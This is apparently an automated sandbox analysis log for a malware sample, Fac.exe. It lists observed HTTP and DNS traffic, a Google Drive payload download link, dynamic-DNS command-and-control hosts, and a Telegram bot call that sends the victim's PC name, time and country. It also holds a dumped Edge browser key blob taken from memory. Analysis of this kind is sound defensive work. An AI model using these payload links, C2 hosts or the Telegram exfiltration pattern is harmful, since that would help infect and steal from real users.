Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.191 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2018/11/2024%20/%2016:31:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: Fac.exe, 00000002.00000002.43474377171.0000000033F0C000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Nov 2024 13:53:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Fac.exe, 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Fac.exe, 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Fac.exe, 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43463081751.000000000373A000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43463081751.000000000373A000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Fac.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Fac.exe, 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Fac.exe, 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43463081751.000000000373A000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: Fac.exe, 00000002.00000002.43474377171.0000000033CFC000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Fac.exe, 00000002.00000002.43474377171.0000000033CFC000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Fac.exe, 00000002.00000002.43474377171.0000000033CFC000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20a
Source: Fac.exe, 00000002.00000003.42462884484.0000000003785000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D5B000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: Fac.exe, 00000002.00000002.43463081751.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Fac.exe, 00000002.00000002.43463569337.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-
Source: Fac.exe, 00000002.00000002.43463081751.0000000003704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-)
Source: Fac.exe, 00000002.00000002.43463081751.0000000003704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-9
Source: Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43463081751.000000000373A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43463081751.00000000036C8000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462884484.0000000003785000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-&export=download
Source: Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-&export=download0T
Source: Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-&export=downloadBT
Source: Fac.exe, 00000002.00000002.43463081751.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-&export=downloada/
Source: Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-&export=downloadhT
Source: Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eicar.org/
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: Fac.exe, 00000002.00000002.43474377171.0000000033E8D000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E81000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: Fac.exe, 00000002.00000002.43474377171.0000000033E8D000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: Fac.exe, 00000002.00000002.43474377171.0000000033E8D000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43463081751.000000000373A000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Fac.exe, 00000002.00000002.43474377171.0000000033C7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.191
Source: Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.191$
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com
Source: Fac.exe, 00000002.00000002.43476613162.0000000034E38000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034DC0000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034F94000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E86000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com/
Source: Fac.exe, 00000002.00000002.43476613162.0000000034E38000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034DC0000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034F94000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E86000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com;
Source: Fac.exe, 00000002.00000003.42462884484.0000000003785000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: Fac.exe, 00000002.00000002.43474377171.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
